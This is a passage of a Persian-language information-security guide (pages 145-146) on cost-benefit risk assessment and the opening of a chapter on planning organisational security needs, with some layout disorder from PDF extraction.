ﺳﺮﺍﻧﺠﺎﻡ ﺑﺎﻳﺪ ﻫﺰﻳﻨﺔ ﭘﻴﺸﮕﻴﺮﻱ ﺍﺯ ﻭﻗـﻮﻉ ﻫـﺮ ﻧـﻮﻉ ﻣﺨـﺎﻃﺮﻩ ﺭﺍ
ﻻ
ﻕ ﻟﺤﻈﻪﺍﻱ ﺍﺣﺘﻤـﺎ ﹰ
ﻣﺤﺎﺳﺒﻪ ﻛﻨﻴﺪ .ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﻫﺰﻳﻨﺔ ﻗﻄ ﹺﻊ ﺑﺮ ﹺ
ﻋﺒﺎﺭﺕ ﺧﻮﺍﻫﺪ ﺑﻮﺩ ﺍﺯ ﻫﺰﻳﻨﺔ ﺯﻣﺎﻥ ﺑﻴﻜﺎﺭﻱ ﭘﺮﺳﻨﻞ ﻭ ﺭﺍﻩﺍﻧـﺪﺍﺯﻱ
ﻣﺠﺪﺩ ﺭﺍﻳﺎﻧﻪﻫﺎ؛ ﺍﻣﺎ ﻫﺰﻳﻨﺔ ﭘﻴﺸﮕﻴﺮﻱ ﺍﺯ ﺁﻥ ﺑﺮﺍﺑﺮ ﻫﺰﻳﻨﺔ ﺧﺮﻳـﺪ ﻭ
ﻧﺼﺐ ﻳﻚ ﺳﻴﺴﺘﻢ UPSﻣﻲﺑﺎﺷﺪ.
ﻫﺰﻳﻨﻪﻫﺎ ﺑﺎﻳﺪ ﺩﺭ ﻃﻮﻝ ﻋﻤﺮ ﻣﻮﺭﺩ ﺍﻧﺘﻈﺎﺭ ،ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺭﻭﻳﻜﺮﺩﻱ
ﻣﻨﺎﺳﺐ ﻣﺴﺘﻬﻠﻚ ﺷﻮﻧﺪ .ﺑﺪﺳﺖ ﺁﻭﺭﺩﻥ ﺍﻳﻦ ﻫﺰﻳﻨﻪﻫﺎ ﻣـﻲﺗﻮﺍﻧـﺪ
ﻫﺰﻳﻨﻪﻫﺎ ﻭ ﺍﻋﺘﺒﺎﺭﺍﺕ ﺩﻳﮕﺮﻱ ﺭﺍ ﻣﺸﺨﺺ ﻛﻨﺪ ﻛﻪ ﺁﻧﻬﺎ ﻧﻴـﺰ ﺑﺎﻳـﺪ
ﻖ ﺑﻬﺘـﺮ
ﻼ ﻧﺼﺐ ﻳﻚ ﺳﻴﺴﺘﻢ ﺍﻃﻔﺎﺀ ﺣﺮﻳ ﹺ
ﻣﺪ ﻧﻈﺮ ﻗﺮﺍﺭ ﮔﻴﺮﻧﺪ .ﻣﺜ ﹰ
ﻣﻲﺗﻮﺍﻧﺪ ﺣﻖ ﺑﻴﻤﺔ ﺁﺗـﺶﺳـﻮﺯﻱ ﺭﺍ ﻛـﺎﻫﺶ ﺩﻫـﺪ ﻭ ﺑـﻪ ﻋﻠـﺖ
ﺍﺳﺘﻬﻼﻙ ﺳﺮﻣﺎﻳﻪ ﺑﺮﺍﻱ ﺷﻤﺎ ﻣﺰﻳﺖ ﻣﺎﻟﻴـﺎﺗﻲ ﺍﻳﺠـﺎﺩ ﻛﻨـﺪ؛ ﺍﻣـﺎ
ﺻﺮﻑ ﭘﻮﻝ ﺑﺮﺍﻱ ﺳﻴﺴﺘﻢ ﺍﻃﻔﺎﺀ ﺣﺮﻳﻖ ﺑﻪ ﺍﻳﻦ ﻣﻌﻨﺎﺳﺖ ﻛـﻪ ﺁﻥ
ﭘﻮﻝ ﺩﻳﮕﺮ ﺑﺮﺍﻱ ﺳﺎﻳﺮ ﺍﻫﺪﺍﻑ ﻧﻈﻴﺮ ﺁﻣﻮﺯﺵ ﻛﺎﺭﻛﻨـﺎﻥ ﻳـﺎ ﺣﺘـﻲ
ﺳﺮﻣﺎﻳﻪﮔﺬﺍﺭﻱ ﺩﺭ ﺩﺳﺘﺮﺱ ﻧﻴﺴﺖ.
ﺟﻤﻌﺒﻨﺪﻱ ﻧﺘﺎﻳﺞ
ﺩﺭ ﺑﺨﺶ ﻧﺘﻴﺠﻪﮔﻴﺮﻱ ﺑﺎﻳﺪ ﻳﻚ ﺟﺪﻭﻝ ﭼﻨﺪ ﺳﺘﻮﻧﻲ ﺍﺯ ﺩﺍﺭﺍﺋﻴﻬـﺎ،
ﻣﺨﺎﻃﺮﺍﺕ ﻭ ﺯﻳﺎﻧﻬﺎﻱ ﺍﺣﺘﻤﺎﻟﻲ ﻃﺮﺍﺣﻲ ﻛﻨﻴﺪ .ﺑـﺮﺍﻱ ﻫـﺮ ﺯﻳـﺎﻥ
ﺑﺎﻳﺪ ﺍﺣﺘﻤﺎﻝ ،ﺧﺴﺎﺭﺕ ﭘﻴﺶﺑﻴﻨﻲﺷﺪﻩ ﻭ ﻣﻘـﺪﺍﺭ ﭘـﻮﻝ ﻣـﻮﺭﺩ ﻧﻴـﺎﺯ
ﺑﺮﺍﻱ ﭘﻴﺸﮕﻴﺮﻱ ﺍﺯ ﻭﻗﻮﻉ ﺁﻧﺮﺍ ﺑﺪﺍﻧﻴﺪ .ﺍﮔﺮ ﺧﻴﻠـﻲ ﺩﻗﻴـﻖ ﻫـﺴﺘﻴﺪ
ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﺣﺘﻤـﺎﻝ ﻧﺎﻣﻨﺎﺳـﺐ ﺑـﻮﺩﻥ ﺗﻤﻬﻴـﺪﺍﺕ ﺩﻓـﺎﻋﻲ ﺭﺍ ﻧﻴـﺰ
ﻣﺤﺎﺳﺒﻪ ﻛﻨﻴﺪ .ﺍﻛﻨﻮﻥ ﻓﺮﺁﻳﻨﺪ ﺗﺼﻤﻴﻢﮔﻴﺮﻱ ﺩﺭ ﻣﻮﺭﺩ ﺑﻜﺎﺭ ﮔﺮﻓﺘﻦ
ﻼ ﺭﻭﺷـﻦ ﺍﺳـﺖ .ﻛﺎﻓﻴـﺴﺖ
ﻳﺎ ﻧﮕﺮﻓﺘﻦ ﻫﺮ ﻣﻜﺎﻧﻴﺰﻡ ﺩﻓﺎﻋﻲ ﻛﺎﻣ ﹰ
ﺷﻤﺎ ﺿﺮﺭ ﻣﻮﺭﺩ ﺍﻧﺘﻈـﺎﺭ ﻫـﺮ ﻣﺨـﺎﻃﺮﻩ ﺭﺍ ﺩﺭ ﺍﺣﺘﻤـﺎﻝ ﻭﻗـﻮﻉ ﺁﻥ
ﺿﺮﺏ ﻛﻨﻴﺪ ﺗﺎ ﺑﺮﺍﻱ ﻫﺮ ﺗﻬﺪﻳﺪ ﻳﻚ ﻛﻤﻴـﺖ ﺑﺪﺳـﺖ ﺁﻳـﺪ .ﺍﻳـﻦ
ﺍﺭﻗﺎﻡ ﺭﺍ ﺑﻪ ﺗﺮﺗﻴﺐ ﻧﺰﻭﻟﻲ ﻣﺮﺗﺐ ﻧﻤﺎﻳﻴـﺪ ﻭ ﻛﻤﻴـﺖ ﻣﺘﻨـﺎﻇﺮ ﻫـﺮ
ﺗﻬﺪﻳﺪ ﺭﺍ ﺑﺎ ﻫﺰﻳﻨﺔ ﭘﻴﺸﮕﻴﺮﻱ ﺁﻥ ﻣﻘﺎﻳﺴﻪ ﻧﻤﺎﻳﻴﺪ.
ﻧﺘﻴﺠﺔ ﺍﻳﻦ ﻣﻘﺎﻳﺴﻪ ﻓﻬﺮﺳﺘﻲ ﺍﺳﺖ ﺍﻭﻟﻮﻳﺖﺑﻨﺪﻱ ﺷـﺪﻩ ﺍﺯ ﺁﻧﭽـﻪ
ﻛﻪ ﺑﺎﻳﺪ ﺍﻧﺠﺎﻡ ﺷﻮﺩ .ﺍﻳﻦ ﻓﻬﺮﺳﺖ ﻣﻤﻜﻦ ﺍﺳـﺖ ﺩﺭ ﺍﺑﺘـﺪﺍ ﻛﻤـﻲ
ﺗﻌﺠﺐﺁﻭﺭ ﺑﺎﺷﺪ .ﺗﻮﺟﻪ ﻛﻨﻴﺪ ﻛﻪ ﻫﺪﻑ ﺷـﻤﺎ ﺑﺎﻳـﺪ ﺟﻠـﻮﮔﻴﺮﻱ ﺍﺯ
ﺯﻳﺎﻧﻬﺎﻱ ﭘﺮﻫﺰﻳﻨﻪ ﻭ ﻣﺤﺘﻤﻞ ﻭ ﺗﻮﺟـﻪ ﻛﻤﺘـﺮ ﺑـﻪ ﻣـﻮﺍﺭﺩ ﻧـﺎﺩﺭ ﻭ
ﻛﻢﻫﺰﻳﻨﻪ ﺑﺎﺷﺪ .ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻣﺤﻴﻄﻬﺎ ﺍﺣﺘﻤﺎﻝ ﻭﻗـﻮﻉ ﻣـﻮﺍﺭﺩﻱ
ﻧﻈﻴﺮ ﺁﺗﺶﺳﻮﺯﻱ ﻭ ﺍﺯ ﺩﺳﺖ ﺩﺍﺩﻥ ﭘﺮﺳﻨﻞ ﻛﻠﻴﺪﻱ ﺑـﺴﻴﺎﺭ ﺑـﻴﺶ
ﺍﺯ ﻣﻮﺭﺩ ﻧﻔﻮﺫ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻦ ﺷﺒﻜﻪ ﻣﻲﺑﺎﺷﺪ؛ ﺍﻣﺎ ﺑـﺎ ﻛﻤـﺎﻝ ﺗﻌﺠـﺐ
ﺍﻳﻦ ﻧﻔﻮﺫﻫﺎﻱ ﺷﺒﻜﻪﺍﻱ ﻫﺴﺘﻨﺪ ﻛﻪ ﺗﻮﺟـﻪ ﻣـﺪﻳﺮﺍﻥ ﻭ ﺩﺭﻧﺘﻴﺠـﻪ
ﻗﺴﻤﺖ ﻋﻤﺪﻩﺍﻱ ﺍﺯ ﺑﻮﺩﺟﻪ ﺭﺍ ﺑـﻪ ﺧـﻮﺩ ﺟﻠـﺐ ﻣـﻲﻛﻨﻨـﺪ .ﺍﻳـﻦ
ﻋﻤﻠﻜﺮﺩ ﺍﺯ ﻟﺤﺎﻅ ﻫﺰﻳﻨـﻪ ﺍﺛـﺮﺑﺨﺶ ﻧﻴـﺴﺖ ﻭ ﺑـﺎﻻﺗﺮﻳﻦ ﺳـﻄﺢ
ﺍﻃﻤﻴﻨﺎﻥ ﺭﺍ ﺑﺮﺍﻱ ﻛﻞ ﺳﻴﺴﺘﻢ ﻓﺮﺍﻫﻢ ﻧﻤـﻲﻛﻨـﺪ .ﺑـﺮﺍﻱ ﺗﺠـﺴﻢ
ﺍﻗﺪﺍﻣﺎﺗﻲ ﻛﻪ ﺑﺎﻳﺪ ﺍﻧﺠﺎﻡ ﺩﻫﻴﺪ ،ﺁﻧﭽﻪ ﺑﺮﺍﻱ ﭘﻴـﺸﮕﻴﺮﻱ ﻭ ﺗـﺮﻣﻴﻢ
ﻫﺮ ﺭﺧﺪﺍﺩ ﺟﻤﻊﺁﻭﺭﻱ ﻛﺮﺩﻩﺍﻳﺪ ﺭﺍ ﺑﺮ ﻣﺒﻨﺎﻱ ﺍﻭﻟﻮﻳﺖ ،ﻃﺒﻘﻪﺑﻨـﺪﻱ
ﻧﻤﺎﻳﻴﺪ .ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ ﻫﺰﻳﻨﺔ ﺗـﺮﻣﻴﻢ ﺭﺍ ﺑـﻪ ﻣﻴـﺎﻧﮕﻴﻦ ﺯﻳـﺎﻥ
ﻣﻮﺭﺩ ﺍﻧﺘﻈﺎﺭ ﺍﺿﺎﻓﻪ ﻛﻨﻴﺪ ﻭ ﺁﻧﺮﺍ ﺩﺭ ﺍﺣﺘﻤﺎﻝ ﻭﻗﻮﻉ ﺭﺧـﺪﺍﺩ ﺿـﺮﺏ
ﻧﻤﺎﻳﻴﺪ .ﺁﻧﮕﺎﻩ ﻧﺘـﺎﻳﺞ ﺣﺎﺻـﻠﻪ ﺭﺍ ﺑـﺎ ﻫﺰﻳﻨـﺔ ﺳـﺎﻻﻧﺔ ﭘﻴـﺸﮕﻴﺮﻱ
ﻣﻘﺎﻳﺴﻪ ﻛﻨﻴﺪ .ﺍﮔﺮ ﻫﺰﻳﻨﻪﻫﺎ ﻛﻤﺘﺮ ﺍﺯ ﻫﺰﻳﻨﺔ ﻣﻮﺭﺩ ﺍﻧﺘﻈﺎﺭ ﻣﺨﺎﻃﺮﻩ
ﺍﺳﺖ ﺗﻮﺻﻴﻪ ﻣﻲﺷﻮﺩ ﻛﻪ ﺩﺭﺻﻮﺭﺕ ﻭﺟـﻮﺩ ﻣﻨـﺎﺑﻊ ﻣـﺎﻟﻲ ﻛـﺎﻓﻲ
ﺍﺳــﺘﺮﺍﺗﮋﻱ ﭘﻴــﺸﮕﻴﺮﻱ ﺭﺍ ﺩﺭ ﭘــﻴﺶ ﺑﮕﻴﺮﻳــﺪ؛ ﺍﻣــﺎ ﺍﮔــﺮ ﻫﺰﻳﻨــﺔ
ﭘﻴﺸﮕﻴﺮﻱ ﺑﻴﺶ ﺍﺯ ﻫﺰﻳﻨﺔ ﺁﺳﻴﺒﻬﺎ ﻭ ﺗﺮﻣﻴ ﹺﻢ ﺑﻌﺪ ﺍﺯ ﻭﻗـﻮﻉ ﺭﺧـﺪﺍﺩ
ﺍﺳﺖ ،ﺗﺎ ﭘﻴﺶ ﺍﺯ ﻭﻗﻮﻉ ﺣﺎﺩﺛﻪ ﻫﻴﭻ ﺍﻗﺪﺍﻣﻲ ﻧﻜﻨﻴﺪ.
١٤٥
ﺑﺨﺶ ﺳﻮﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ
ﺑﺮﻧﺎﻣﻪﺭﻳﺰﻱ ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﻣﻲﺗﻮﺍﻥ ﺑﻪ ﭘﻨﺞ ﻣﺮﺣﻠﺔ ﻣﺠﺰﺍ ﺗﻘﺴﻴﻢ ﻛﺮﺩ:
ﻓﺼﻞ ﭼﻬﺎﺭﻡ
ﺑﺮﻧﺎﻣﻪﺭﻳﺰﻱ ﺑﺮﺍﻱ ﻧﻴﺎﺯﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ
.۱
.۲
.۳
.۴
.۵
ﻛﻠﻴﺎﺕ
ﺩﻭ ﺍﺻﻞ ﺍﺳﺎﺳﻲ ﻭﺟـﻮﺩ ﺩﺍﺭﻧـﺪ ﻛـﻪ ﺩﺭ ﺑﺮﻧﺎﻣـﻪﺭﻳـﺰﻱ ﺍﺛـﺮﺑﺨﺶ
ﺳﻴﺎﺳﺖ ﻭ ﺍﻣﻨﻴﺖ ﺗﺄﺛﻴﺮ ﺿﻤﻨﻲ ﻣﻲﮔﺬﺍﺭﻧﺪ:
ﺍﻳﻦ ﻓﺼﻞ ﺑﻪ ﺳﻴﺎﺳﺘﻬﺎ ﻭ ﺭﻭﺍﻟﻬﺎﻱ ﻣﺮﺑﻮﻁ ﺑﻪ ﭘﻴﺸﮕﻴﺮﻱ ﻭ ﺩﻓـﺎﻉ
ﻣﺆﺛﺮ ﺩﺭ ﻣﻘﺎﺑﻞ ﺗﻬﺪﻳﺪﺍﺗﻲ ﻛﻪ ﺩﺭ ﻓﺼﻞ ﻗﺒﻞ ﺩﺭ ﻣﻮﺭﺩ ﺁﻧﻬﺎ ﺑﺤـﺚ
ﺷﺪ ﻣﻲﭘﺮﺩﺍﺯﺩ ﻭ ﺟﺰﺋﻴﺎﺕ ﻓﺮﺁﻳﻨﺪ ﺑﺮﻧﺎﻣﻪﺭﻳﺰﻱ ﺭﺍ ﺷﺮﺡ ﻣﻲﺩﻫﺪ.
ﺍﺳﺎﺳﹰﺎ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻣﺠﻤﻮﻋـﻪﺍﻱ ﺍﺯ ﺭﺍﻩﺣﻠﻬـﺎﻱ ﻓﻨـﻲ ﺑـﺮﺍﻱ
ﻣــﺸﻜﻼﺕ ﻏﻴﺮﻓﻨــﻲ ﺍﺳــﺖ .ﺯﻣــﺎﻥ ،ﭘــﻮﻝ ﻭ ﺗــﻼﺵ ﺯﻳــﺎﺩﻱ ﺭﺍ
ﻣﻲﺗﻮﺍﻥ ﺑـﺮﺍﻱ ﺍﻳﻤـﻦ ﻛـﺮﺩﻥ ﺭﺍﻳﺎﻧـﻪ ﺻـﺮﻑ ﻛـﺮﺩ ،ﺍﻣـﺎ ﻫﺮﮔـﺰ
ﻧﻤﻲﺗﻮﺍﻥ ﺍﺯ ﻧﮕﺮﺍﻧﻲ ﺩﺭ ﻣﻮﺭﺩ ﭘـﺎﻙﺷـﺪﻥ ﺗـﺼﺎﺩﻓﻲ ﺩﺍﺩﻩﻫـﺎ ﻳـﺎ
ﺗﺨﺮﻳﺐ ﻋﻤﺪﻱ ﺍﻃﻼﻋﺎﺕ ﺭﺍﺣﺖ ﺷﺪ .ﺑﺎ ﺩﺭﻧﻈﺮ ﮔﺮﻓﺘﻦ ﻣﺠﻤﻮﻋﺔ
ﺷﺮﺍﻳﻂ -ﺍﺷﻜﺎﻻﺕ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ،ﺣﻮﺍﺩﺙ ،ﺍﺷـﺘﺒﺎﻫﺎﺕ ،ﺑـﺪﺍﻗﺒﺎﻟﻲ،
ﺁﺏ ﻭ ﻫﻮﺍﻱ ﺑﺪ ﻳﺎ ﻳﻚ ﻣﻬﺎﺟﻢ ﻣﺠﻬﺰ ﻭ ﺑـﺎ ﺍﻧﮕﻴـﺰﻩ -ﻣـﺸﺎﻫﺪﻩ
ﻣﻲﺷﻮﺩ ﻛﻪ ﻫﺮ ﺭﺍﻳﺎﻧﻪ ﻣﻤﻜﻦ ﺍﺳـﺖ ﻣـﻮﺭﺩ ﺳـﻮﺀ ﺍﺳـﺘﻔﺎﺩﻩ ﻗـﺮﺍﺭ
ﻼ ﻣﻨﻬﺪﻡ ﺷﻮﺩ.
ﺑﮕﻴﺮﺩ ،ﺍﺯ ﻓﻌﺎﻟﻴﺖ ﺑﻴﺎﻓﺘﺪ ،ﻳﺎ ﺣﺘﻲ ﻛﺎﻣ ﹰ
ﻭﻇﻴﻔﺔ ﻣﺘﺨﺼﺼﻴﻦ ﺍﻣﻨﻴﺘﻲ ﻛﻤﻚ ﺑﻪ ﺳﺎﺯﻣﺎﻥ ﺩﺭ ﺗﺼﻤﻴﻢﮔﻴـﺮﻱ
ﺩﺭ ﻣﻮﺭﺩ ﺯﻣﺎﻥ ﻭ ﻫﺰﻳﻨﻪﺍﻱ ﺍﺳﺖ ﻛﻪ ﻣـﻲﺧﻮﺍﻫـﺪ ﺑـﺮﺍﻱ ﻣـﺴﺌﻠﻪ
ﺍﻣﻨﻴﺖ ﺍﺧﺘﺼﺎﺹ ﺩﻫﺪ .ﺑﺨﺶ ﺩﻳﮕﺮ ﺍﻳﻨﻜﺎﺭ ﺣﺼﻮﻝ ﺍﻃﻤﻴﻨـﺎﻥ ﺍﺯ
ﻭﺟﻮﺩ ﺳﻴﺎﺳﺘﻬﺎ ،ﺧﻂﻣﺸﻲﻫـﺎ ﻭ ﺭﻭﺍﻟﻬـﺎﻱ ﻣﻨﺎﺳـﺐ ﺩﺭ ﺳـﺎﺯﻣﺎﻥ
ﺍﺳﺖ ﺗﺎ ﺑﻮﺩﺟﺔ ﺍﻣﻨﻴﺘﻲ ﺑﺼﻮﺭﺕ ﺻﺤﻴﺢ ﻫﺰﻳﻨﻪ ﺷـﻮﺩ .ﺩﺭ ﻧﻬﺎﻳـﺖ
ﺍﻓﺮﺍﺩ ﺣﺮﻓﻪﺍﻱ ﺑﺎﻳﺪ ﺳﻴﺴﺘﻢ ﺭﺍ ﺑﺮﺭﺳﻲ ﻛﻨﻨـﺪ ﺗـﺎ ﺍﺯ ﭘﻴـﺎﺩﻩﺳـﺎﺯﻱ
ﺻﺤﻴﺢ ﻛﻨﺘﺮﻟﻬﺎﻱ ﻣﻨﺎﺳﺐ ﺩﺭ ﺭﺍﺳـﺘﺎﻱ ﺑـﺮﺁﻭﺭﺩﻩﺷـﺪﻥ ﺍﻫـﺪﺍﻑ
ﺍﻃﻤﻴﻨﺎﻥ ﻳﺎﺑﻨﺪ .ﺑﻨﺎﺑﺮﺍﻳﻦ ﺍﻣﻨﻴﺖ ﻋﻤﻠﻲ ﺑﻴﺶ ﺍﺯ ﺍﻳﻨﻜـﻪ ﻣـﺴﺌﻠﻪﺍﻱ
ﻓﻨﻲ ﺑﺎﺷﺪ ،ﻣﺴﺌﻠﻪﺍﻱ ﻣﺪﻳﺮﻳﺘﻲ ﺍﺳﺖ .ﺩﺭﻧﺘﻴﺠﻪ ﺍﻣﻨﻴﺖ ﺑﺎﻳﺪ ﻳﻜـﻲ
ﺍﺯ ﺍﻭﻟﻮﻳﺘﻬﺎﻱ ﻣﺪﻳﺮﻳﺖ ﺳﺎﺯﻣﺎﻥ ﺑﺎﺷﺪ .ﺣﺘﻲ ﺩﺭ ﻣﺆﺳـﺴﺎﺕ ﺑـﺴﻴﺎﺭ
ﻛﻮﭼﻚ ﻛﻪ ﺑﻮﺩﺟﺔ ﻗﺎﺑﻞ ﺗﻮﺟﻬﻲ ﺑﺮﺍﻱ ﺍﻣﻨﻴﺖ ﺻﺮﻑ ﻧﻤﻲﺷـﻮﺩ،
ﻣﺪﻳﺮﻳﺖ ﺑﺎﻳﺪ ﻣﺴﺎﺋﻞ ﺍﺻﻠﻲ ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﺩﺭﻙ ﻛﻨﺪ ﻭ ﺍﺻﻮﻝ ﺍﻭﻟﻴـﺔ
ﺍﻣﻨﻴﺖ ﺭﺍ ﺑﺮﺍﻱ ﺣﻔﺎﻇﺖ ﺍﺯ ﺩﺍﺭﺍﺋﻴﻬﺎ ﺑﻪ ﺍﺟﺮﺍ ﺩﺭﺁﻭﺭﺩ.
ﺩﺭ ﺳﺎﺯﻣﺎﻧﻬﺎ ﺁﮔﺎﻫﻲ ﺍﺯ ﺍﻣﻨﻴﺖ ﻭ ﺳﻴﺎﺳﺖ ﺍﻣﻨﻴﺘﻲ ﺑﺎﻳﺪ ﺍﺯ ﺑـﺎﻻ ﺑـﻪ
ﭘﺎﺋﻴﻦ ﮔﺴﺘﺮﺵ ﻳﺎﺑـﺪ .ﻧﮕﺮﺍﻧﻴﻬـﺎ ﻭ ﺁﮔـﺎﻫﻲ ﻛـﺎﺭﺑﺮﺍﻥ ﺍﺯ ﻣـﺴﺎﺋﻞ
ﺍﻣﻨﻴﺘﻲ ﺣﺎﺋﺰ ﺍﻫﻤﻴـﺖ ﺍﺳـﺖ؛ ﺍﻣـﺎ ﺁﻧﻬـﺎ ﻧﻤـﻲﺗﻮﺍﻧﻨـﺪ ﺩﺭ ﮔـﺴﺘﺮﺓ
ﺳﺎﺯﻣﺎﻥ ﻳﻚ ﻓﺮﻫﻨﮓ ﻣﺆﺛﺮ ﺍﻣﻨﻴﺘﻲ ﺍﻳﺠﺎﺩ ﻭ ﺁﻧﺮﺍ ﺣﻔﻆ ﻧﻤﺎﻳﻨﺪ .ﺩﺭ
ﻋﻮﺽ ﺍﻳﻦ ﻣﺪﻳﺮﺍﻥ ﺳﺎﺯﻣﺎﻥ ﻫﺴﺘﻨﺪ ﻛﻪ ﺑﺎﻳﺪ ﺑﻪ ﺍﻣﻨﻴـﺖ ﺑﻌﻨـﻮﺍﻥ
ﻣﻮﺿﻮﻋﻲ ﻣﻬﻢ ﺑﻨﮕﺮﻧﺪ ﻭ ﺿﻮﺍﺑﻂ ﻭ ﻣﻘﺮﺭﺍﺕ ﺁﻧﺮﺍ ﻧﻈﻴﺮ ﺳﺎﻳﺮ ﺍﻓﺮﺍﺩ
ﺑﭙﺬﻳﺮﻧﺪ ﻭ ﺍﺟﺮﺍ ﻧﻤﺎﻳﻨﺪ.
ﺍﻣﻨﻴﺖ ﻣﺆﺛﺮ ﺭﺍﻳﺎﻧﻪ ﺑﻪ ﻣﻌﻨﺎﻱ ﺣﻔﺎﻇـﺖ ﺍﺯ ﺍﻃﻼﻋـﺎﺕ ﻣـﻲﺑﺎﺷـﺪ.
ﺍﮔﺮﭼﻪ ﺣﻔﺎﻇﺖ ﺍﺯ ﻣﻨﺎﺑﻊ ﺩﻳﮕﺮ ﻫـﻢ ﻣﻬـﻢ ﺍﺳـﺖ ﺍﻣـﺎ ﺿـﺮﺭﻫﺎﻱ
ﻧﺎﺷﻲ ﺍﺯ ﺗﺨﺮﻳﺐ ﺳﺎﻳﺮ ﻣﻨﺎﺑﻊ ﺑﺴﻴﺎﺭ ﺭﺍﺣﺖﺗﺮ ﺍﺯ ﺿـﺮﺭﻫﺎﻱ ﻭﺍﺭﺩﻩ
ﺑﻪ ﺍﻃﻼﻋﺎﺕ ﻗﺎﺑﻞ ﺗﺸﺨﻴﺺ ﻭ ﺟﺒـﺮﺍﻥ ﻫـﺴﺘﻨﺪ .ﻛﻠﻴـﺔ ﻃﺮﺣﻬـﺎ،
ﺳﻴﺎﺳــﺘﻬﺎ ﻭ ﺭﻭﺍﻟﻬــﺎ ﺑﺎﻳــﺪ ﻣــﻨﻌﻜﺲﻛﻨﻨــﺪﺓ ﻧﻴــﺎﺯ ﺑــﻪ ﺣﻔﺎﻇــﺖ ﺍﺯ
ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﻫﺮ ﻗﺎﻟﺐ ﻣﻤﻜﻦ ﺑﺎﺷﻨﺪ .ﺍﻃﻼﻋﺎﺕ ﺍﻧﺤـﺼﺎﺭﻱ ﺍﮔـﺮ
ﺑﻪ ﭼﺎﭖ ﺑﺮﺳﻨﺪ ﻳﺎ ﺑﻪ ﻳﻚ ﺩﻓﺘﺮ ﻓﻜـﺲ ﺷـﻮﻧﺪ ﺍﺭﺯﺵ ﺧـﻮﺩ ﺭﺍ ﺍﺯ
ﺩﺳﺖ ﻧﻤﻲﺩﻫﻨﺪ .ﺍﻃﻼﻋﺎﺕ ﻣﺤﺮﻣﺎﻧﺔ ﻣﺸﺘﺮﻳﺎﻥ ﻧﻴـﺰ ﺍﮔـﺮ ﺑﺠـﺎﻱ
ﺍﺭﺳﺎﻝ ﺍﺯ ﻃﺮﻳﻖ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ،ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺗﻠﻔﻦ ﮔـﺰﺍﺭﺵ
ﺷﺪﻧﺪ ﻫﻤﭽﻨﺎﻥ ﺍﺯ ﺍﺭﺯﺵ ﺯﻳـﺎﺩﻱ ﺑﺮﺧﻮﺭﺩﺍﺭﻧـﺪ .ﺧﻼﺻـﻪ ﺍﻳﻨﻜـﻪ
ﺍﻃﻼﻋﺎﺕ ﺑﺎﻳﺪ ﻣﻮﺭﺩ ﻣﺤﺎﻓﻈﺖ ﻗﺮﺍﺭ ﺑﮕﻴﺮﺩ ،ﻣﺴﺘﻘﻞ ﺍﺯ ﺍﻳﻨﻜـﻪ ﺩﺭ
ﭼﻪ ﻗﺎﻟﺒﻲ ﺑﺎﺷﺪ.
ﺍﻧﻮﺍﻉ ﻣﺨﺘﻠﻒ ﻭ ﺗﻌﺎﺭﻳﻒ ﻣﺘﻔﺎﻭﺗﻲ ﺍﺯ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ.
ﺍﻳﻦ ﻛﺘﺎﺏ ﺑﺠﺎﻱ ﺍﺭﺍﺋﻪ ﻳﻚ ﺗﻌﺮﻳﻒ ﺭﺳﻤﻲ ،ﺗﻮﺟـﻪ ﺑﻴـﺸﺘﺮﻱ ﺑـﻪ
ﺭﻭﻳﻜﺮﺩ ﻋﻤﻠﻲ ﺩﺍﺭﺩ ﻭ ﺩﺭ ﻣﻮﺭﺩ ﺍﻧﻮﺍﻉ ﺣﻔﺎﻇﺘﻬﺎﻳﻲ ﻛﻪ ﺑﺎﻳـﺪ ﻣـﻮﺭﺩ
ﻣﻼﺣﻈﻪ ﻗﺮﺍﺭ ﮔﻴﺮﻧﺪ ﺑﻪ ﺑﺤﺚ ﭘﺮﺩﺍﺧﺘﻪ ﺍﺳﺖ.
ﺑﺨﺶ ﺳﻮﻡ
ﺳﻴﺎﺳﺘﮕﺬﺍﺭﻱ ﻭ ﺭﺍﻩﺣﻠﻬﺎﻱ ﻓﻨﻲ
ﺑﺮﺍﻱ ﺗﺄﻣﻴﻦ ﻣﻮﻓﻘﻴﺖﺁﻣﻴﺰ ﺍﻣﻨﻴﺖ
ﺑﺮﻧﺎﻣﻪﺭﻳﺰﻱ ﺑﺮﺍﻱ ﺗﻌﻴﻴﻦ ﻧﻴﺎﺯﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ
ﺍﺭﺯﻳﺎﺑﻲ ﻣﺨﺎﻃﺮﻩ ﻭ ﺍﻧﺘﺨﺎﺏ ﺑﻬﺘﺮﻳﻦ ﺷﻴﻮﻩﻫﺎ
ﺍﻳﺠﺎﺩ ﺳﻴﺎﺳﺘﻬﺎﻳﻲ ﺑﺮﺍﻱ ﺍﻧﻌﻜﺎﺱ ﻧﻴﺎﺯﻫﺎ
ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺍﻣﻨﻴﺖ
ﺑﺮﺭﺳﻲ ﻭ ﻭﺍﻛﻨﺶ ﺑﻪ ﻭﻗﺎﻳﻊ
١٤٦
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
ﺩﺳﺘﻪﺑﻨﺪﻱ ﻣﻼﺣﻈﺎﺕ ﺍﻣﻨﻴﺘﻲ
